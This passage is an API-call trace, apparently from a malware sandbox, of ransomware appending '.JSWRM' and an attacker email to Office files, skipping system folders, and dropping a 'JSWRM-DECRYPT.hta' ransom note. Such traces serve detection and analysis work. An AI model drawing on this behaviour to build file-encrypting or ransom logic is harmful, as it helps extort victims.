RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0131.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0131.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.481] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\computers\\computericonmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\computers\\computericonmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0131.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0131.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0131.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0131.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0131.482] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4504a81f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4504a81f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x45070a02, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0131.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0131.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0131.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0131.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0131.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0131.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0131.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0131.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0131.482] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4504a81f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4504a81f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x45070a02, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0131.482] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0131.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0131.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0131.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0131.482] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44e347ac, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x44e347ac, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x44e347ac, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x210d28, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0131.482] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0131.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0131.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0131.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0131.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0131.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0131.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0131.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0131.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0131.483] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44e347ac, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x44e347ac, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x44e347ac, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x210d28, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0131.483] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0131.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0131.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0131.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0131.483] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44e347ac, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x44e347ac, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x44e347ac, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0131.483] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0131.484] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0131.484] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0131.484] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0131.484] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0131.484] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0131.484] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0131.484] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0131.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0131.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0131.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0131.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0131.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0131.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0131.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0131.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0131.484] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44e347ac, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x44e347ac, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x44e347ac, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0131.484] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0131.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0131.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0131.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0131.484] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 1 [0131.484] lstrcmpiW (lpString1="ToolIcons", lpString2=".") returned 1 [0131.484] lstrcmpiW (lpString1="ToolIcons", lpString2="..") returned 1 [0131.484] lstrcmpiW (lpString1="ToolIcons", lpString2="...") returned 1 [0131.484] lstrcmpiW (lpString1="ToolIcons", lpString2="windows") returned -1 [0131.484] lstrcmpiW (lpString1="ToolIcons", lpString2="recovery") returned 1 [0131.485] lstrcmpiW (lpString1="ToolIcons", lpString2="perflogs") returned 1 [0131.485] lstrcmpiW (lpString1="ToolIcons", lpString2="documents and settings") returned 1 [0131.485] lstrcmpiW (lpString1="ToolIcons", lpString2="$RECYCLE.BIN") returned 1 [0131.485] lstrcmpiW (lpString1="ToolIcons", lpString2="system volume information") returned 1 [0131.485] lstrcmpiW (lpString1="ToolIcons", lpString2="msocache") returned 1 [0131.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0131.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0131.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0131.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0131.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0131.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0131.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\jswrm-decrypt.hta")) returned 0xffffffff [0131.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0131.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0131.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0131.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0131.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27b348 [0131.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0131.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0131.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0131.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0131.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0131.489] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.489] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0131.490] CloseHandle (hObject=0x238) returned 1 [0131.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0131.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0131.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0131.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0131.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0131.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0131.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0131.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0131.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0131.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\jswrm-decrypt.hta")) returned 0x20 [0131.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0131.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0131.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0131.491] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x45096d52, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0131.491] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0131.491] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x45096d52, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="..", cAlternateFileName="")) returned 1 [0131.492] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0131.492] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0131.492] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x59cc74e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59cc74e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="ALERT.ICO", cAlternateFileName="")) returned 1 [0131.492] lstrcmpiW (lpString1="ALERT.ICO", lpString2=".") returned 1 [0131.492] lstrcmpiW (lpString1="ALERT.ICO", lpString2="..") returned 1 [0131.492] lstrcmpiW (lpString1="ALERT.ICO", lpString2="...") returned 1 [0131.492] lstrcmpiW (lpString1="ALERT.ICO", lpString2="windows") returned -1 [0131.492] lstrcmpiW (lpString1="ALERT.ICO", lpString2="recovery") returned -1 [0131.492] lstrcmpiW (lpString1="ALERT.ICO", lpString2="perflogs") returned -1 [0131.492] lstrcmpiW (lpString1="ALERT.ICO", lpString2="documents and settings") returned -1 [0131.492] lstrcmpiW (lpString1="ALERT.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.492] lstrcmpiW (lpString1="ALERT.ICO", lpString2="system volume information") returned -1 [0131.492] lstrcmpiW (lpString1="ALERT.ICO", lpString2="msocache") returned -1 [0131.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0131.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALERT.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALERT.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALERT.ICO", lpUsedDefaultChar=0x0) returned 9 [0131.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0131.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALERT.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ALERT.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALERT.ICO", lpUsedDefaultChar=0x0) returned 9 [0131.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0131.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) 